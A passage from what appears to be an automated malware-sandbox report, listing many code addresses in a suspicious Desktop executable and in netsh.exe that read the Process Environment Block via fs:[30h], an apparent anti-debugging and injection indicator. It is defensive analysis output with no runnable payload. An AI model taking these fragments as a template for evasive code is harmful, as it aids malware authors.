          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01013B7A mov eax, dword ptr fs:[00000030h]2_2_01013B7A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A138A mov eax, dword ptr fs:[00000030h]2_2_010A138A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109D380 mov ecx, dword ptr fs:[00000030h]2_2_0109D380
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101B390 mov eax, dword ptr fs:[00000030h]2_2_0101B390
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012397 mov eax, dword ptr fs:[00000030h]2_2_01012397
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h]2_2_01014BAD
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h]2_2_01014BAD
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h]2_2_01014BAD
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B5BA5 mov eax, dword ptr fs:[00000030h]2_2_010B5BA5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]2_2_00FE9240
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]2_2_00FE9240
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]2_2_00FE9240
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]2_2_00FE9240
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010653CA mov eax, dword ptr fs:[00000030h]2_2_010653CA
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010653CA mov eax, dword ptr fs:[00000030h]2_2_010653CA
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]2_2_010103E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]2_2_010103E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]2_2_010103E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]2_2_010103E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]2_2_010103E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]2_2_010103E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEAA16 mov eax, dword ptr fs:[00000030h]2_2_00FEAA16
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEAA16 mov eax, dword ptr fs:[00000030h]2_2_00FEAA16
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100DBE9 mov eax, dword ptr fs:[00000030h]2_2_0100DBE9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h]2_2_00FE5210
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov ecx, dword ptr fs:[00000030h]2_2_00FE5210
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h]2_2_00FE5210
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h]2_2_00FE5210
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF8A0A mov eax, dword ptr fs:[00000030h]2_2_00FF8A0A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01003A1C mov eax, dword ptr fs:[00000030h]2_2_01003A1C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01024A2C mov eax, dword ptr fs:[00000030h]2_2_01024A2C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01024A2C mov eax, dword ptr fs:[00000030h]2_2_01024A2C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01074257 mov eax, dword ptr fs:[00000030h]2_2_01074257
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AEA55 mov eax, dword ptr fs:[00000030h]2_2_010AEA55
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109B260 mov eax, dword ptr fs:[00000030h]2_2_0109B260
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109B260 mov eax, dword ptr fs:[00000030h]2_2_0109B260
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8A62 mov eax, dword ptr fs:[00000030h]2_2_010B8A62
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF1B8F mov eax, dword ptr fs:[00000030h]2_2_00FF1B8F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF1B8F mov eax, dword ptr fs:[00000030h]2_2_00FF1B8F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102927A mov eax, dword ptr fs:[00000030h]2_2_0102927A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101D294 mov eax, dword ptr fs:[00000030h]2_2_0101D294
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101D294 mov eax, dword ptr fs:[00000030h]2_2_0101D294
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]2_2_00FEDB60
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEF358 mov eax, dword ptr fs:[00000030h]2_2_00FEF358
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101FAB0 mov eax, dword ptr fs:[00000030h]2_2_0101FAB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEDB40 mov eax, dword ptr fs:[00000030h]2_2_00FEDB40
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012ACB mov eax, dword ptr fs:[00000030h]2_2_01012ACB
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012AE4 mov eax, dword ptr fs:[00000030h]2_2_01012AE4
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0106A537 mov eax, dword ptr fs:[00000030h]2_2_0106A537
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AE539 mov eax, dword ptr fs:[00000030h]2_2_010AE539
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h]2_2_01014D3B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h]2_2_01014D3B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h]2_2_01014D3B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8D34 mov eax, dword ptr fs:[00000030h]2_2_010B8D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01023D43 mov eax, dword ptr fs:[00000030h]2_2_01023D43
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01063540 mov eax, dword ptr fs:[00000030h]2_2_01063540
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01007D50 mov eax, dword ptr fs:[00000030h]2_2_01007D50
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF849B mov eax, dword ptr fs:[00000030h]2_2_00FF849B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100C577 mov eax, dword ptr fs:[00000030h]2_2_0100C577
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100C577 mov eax, dword ptr fs:[00000030h]2_2_0100C577
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]2_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]2_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]2_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012581 mov eax, dword ptr fs:[00000030h]2_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101FD9B mov eax, dword ptr fs:[00000030h]2_2_0101FD9B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101FD9B mov eax, dword ptr fs:[00000030h]2_2_0101FD9B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010135A1 mov eax, dword ptr fs:[00000030h]2_2_010135A1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B05AC mov eax, dword ptr fs:[00000030h]2_2_010B05AC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B05AC mov eax, dword ptr fs:[00000030h]2_2_010B05AC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h]2_2_01011DB5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h]2_2_01011DB5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h]2_2_01011DB5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]2_2_01066DC9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]2_2_01066DC9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]2_2_01066DC9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov ecx, dword ptr fs:[00000030h]2_2_01066DC9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]2_2_01066DC9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h]2_2_01066DC9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]2_2_010AFDE2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]2_2_010AFDE2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]2_2_010AFDE2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h]2_2_010AFDE2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01098DF1 mov eax, dword ptr fs:[00000030h]2_2_01098DF1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B740D mov eax, dword ptr fs:[00000030h]2_2_010B740D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B740D mov eax, dword ptr fs:[00000030h]2_2_010B740D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B740D mov eax, dword ptr fs:[00000030h]2_2_010B740D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h]2_2_010A1C06
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]2_2_01066C0A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]2_2_01066C0A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]2_2_01066C0A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h]2_2_01066C0A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]2_2_00FFD5E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]2_2_00FFD5E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101BC2C mov eax, dword ptr fs:[00000030h]2_2_0101BC2C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A44B mov eax, dword ptr fs:[00000030h]2_2_0101A44B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107C450 mov eax, dword ptr fs:[00000030h]2_2_0107C450
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107C450 mov eax, dword ptr fs:[00000030h]2_2_0107C450
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100746D mov eax, dword ptr fs:[00000030h]2_2_0100746D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]2_2_00FE2D8A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]2_2_00FE2D8A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]2_2_00FE2D8A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]2_2_00FE2D8A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h]2_2_00FE2D8A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h]2_2_00FF3D34
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEAD30 mov eax, dword ptr fs:[00000030h]2_2_00FEAD30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8CD6 mov eax, dword ptr fs:[00000030h]2_2_010B8CD6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A14FB mov eax, dword ptr fs:[00000030h]2_2_010A14FB
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]2_2_01066CF0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]2_2_01066CF0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]2_2_01066CF0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B070D mov eax, dword ptr fs:[00000030h]2_2_010B070D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B070D mov eax, dword ptr fs:[00000030h]2_2_010B070D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h]2_2_0101A70E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h]2_2_0101A70E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100F716 mov eax, dword ptr fs:[00000030h]2_2_0100F716
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h]2_2_0107FF10
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h]2_2_0107FF10
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF76E2 mov eax, dword ptr fs:[00000030h]2_2_00FF76E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101E730 mov eax, dword ptr fs:[00000030h]2_2_0101E730
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8F6A mov eax, dword ptr fs:[00000030h]2_2_010B8F6A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF766D mov eax, dword ptr fs:[00000030h]2_2_00FF766D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]2_2_01067794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]2_2_01067794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]2_2_01067794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEE620 mov eax, dword ptr fs:[00000030h]2_2_00FEE620
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010237F5 mov eax, dword ptr fs:[00000030h]2_2_010237F5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]2_2_00FEC600
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]2_2_00FEC600
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]2_2_00FEC600
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01018E00 mov eax, dword ptr fs:[00000030h]2_2_01018E00
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1608 mov eax, dword ptr fs:[00000030h]2_2_010A1608
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h]2_2_0101A61C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h]2_2_0101A61C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109FE3F mov eax, dword ptr fs:[00000030h]2_2_0109FE3F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h]2_2_010AAE44
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h]2_2_010AAE44
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF8794 mov eax, dword ptr fs:[00000030h]2_2_00FF8794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FE87 mov eax, dword ptr fs:[00000030h]2_2_0107FE87
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFFF60 mov eax, dword ptr fs:[00000030h]2_2_00FFFF60
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010646A7 mov eax, dword ptr fs:[00000030h]2_2_010646A7
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]2_2_010B0EA5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]2_2_010B0EA5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]2_2_010B0EA5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFEF40 mov eax, dword ptr fs:[00000030h]2_2_00FFEF40
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01028EC7 mov eax, dword ptr fs:[00000030h]2_2_01028EC7
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109FEC0 mov eax, dword ptr fs:[00000030h]2_2_0109FEC0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010136CC mov eax, dword ptr fs:[00000030h]2_2_010136CC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h]2_2_00FE4F2E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h]2_2_00FE4F2E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8ED6 mov eax, dword ptr fs:[00000030h]2_2_010B8ED6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010116E0 mov ecx, dword ptr fs:[00000030h]2_2_010116E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388138A mov eax, dword ptr fs:[00000030h]12_2_0388138A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h]12_2_037F3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h]12_2_037F3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387D380 mov ecx, dword ptr fs:[00000030h]12_2_0387D380
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CDB60 mov ecx, dword ptr fs:[00000030h]12_2_037CDB60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CF358 mov eax, dword ptr fs:[00000030h]12_2_037CF358
